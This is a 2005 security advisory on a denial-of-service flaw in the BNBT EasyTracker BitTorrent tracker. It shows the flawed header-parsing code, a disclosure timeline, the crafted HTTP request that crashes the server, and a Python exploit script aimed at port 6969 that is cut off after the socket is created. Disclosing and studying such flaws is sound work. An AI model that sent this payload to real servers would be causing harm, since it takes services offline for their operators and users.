BNBT EasyTracker DoS Summary
"The Trinity Edition of BNBT (TrinEdit) a modified version of BNBT, whose C++ source can be compiled for any operating system; BNBT EasyTracker a Windows Installer for The Trinity Edition of BNBT, a C++ BitTorrent Tracker."
A Denial of Service vulnerability exists within BNBT which allows an attacker to cause the BNBT to stop responding.
The information has been provided by Sowhat.
The original article can be found at:
Vulnerable Systems:
* BNBT version 7.7r3.2004.10.27 and prior
A specifically crafted HTTP request will cause the BNBT Server stop responding.
By Sending a request such as "GET /index.htm HTTP/1.1\r\n:\r\n\r\n" will cause the DoS. It seems that the bug is located in client.cpp, "//grab headers" section.
Code snips:
// grab headers
string :: size_type iNewLine = m_strReceiveBuf.find( "\r\n" );
string :: size_type iDoubleNewLine = m_strReceiveBuf.find( "\r\n\r\n" );
strTemp = m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ),
iDoubleNewLine - iNewLine - strlen( "\r\n" ) );
while( 1 )
string :: size_type iSplit = strTemp.find( ":" );
string :: size_type iEnd = strTemp.find( "\r\n" );
if( iSplit == string :: npos )
UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" );
string strKey = strTemp.substr( 0, iSplit );
string strValue = strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit -
strlen( "\r\n" ) );//Bug here ??
rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );
strTemp = strTemp.substr( iEnd + strlen( "\r\n" ) );
if( iEnd == string :: npos )
Disclosure Timeline:
2005.08.22 Vendor notified via Webform,no email found
2005.08.30 Vendor no response. Advisory Released
# BNBT EasyTracker Remote D.O.S Exploit
# Bug discoverd and coded by Sowhat
# Version 7.7r3.2004.10.27 and below
# the BNBT project:
import sys
import string
import socket
if (len(sys.argv) != 2):
print "\nUsage: " + sys.argv[0] + " TargetIP\n"
print "#################################"
print "# #"
print "# BNBT EasyTracker Remote D.O.S Exploit #"
print "# Bug discoverd and coded by Sowhat #"
print "# #"
print "#################################"
host = sys.argv[1]
port = 6969
payload = "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)